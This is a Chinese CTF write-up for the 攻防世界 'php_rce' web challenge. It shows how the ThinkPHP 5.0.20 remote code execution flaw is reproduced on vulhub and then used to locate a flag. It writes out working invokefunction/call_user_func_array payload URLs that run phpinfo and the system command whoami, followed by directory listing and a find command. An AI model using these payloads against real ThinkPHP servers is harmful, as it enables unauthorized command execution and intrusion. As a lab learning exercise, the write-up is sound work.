攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)

题目

今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。

f5a5ea6fa2f34470374d9568ada37679.png     

30a34115bc6da54761a0071330b91201.png

解题过程

去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈:

10b5dd88b08896cccd34acf6f0c418f6.png

这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:

输入:http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,可执行phpinfo:

238133a9f2ee2e57cc70ea9ec80c58e6.png

拉到页面底部,看到ThinkPHP的版本是5.0.20:

187417875016f55f1409ed39e60143ca.png

可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下:

输入:http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回:www-data www-data

再回到CTF的这道题,应该考的就是这个命令执行的漏洞:

输出:成功执行phpinfo

再执行ls命令查看当前目录

返回如下,再把index.php和router.php打开看了一下,木有发现flag,再把request和response也检查了下,也木有flag。。

f188414324c6223025c035b5ccd68635.png

再逐级查看上级目录,最终看到一个名为flag的文件:

返回:

c31718909a98f6c2759f870109e4d0a6.png

查看一下flag的内容:

成功找到flag

看了其他人写WP,有更方便的查找文件的linux命令:find / -name "*flag*" (linux命令硬伤来了 ...>_<....>

返回:

3561fe3af5457add31024f8ad86c2a1e.png

比我一级一级的找省事多了。。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值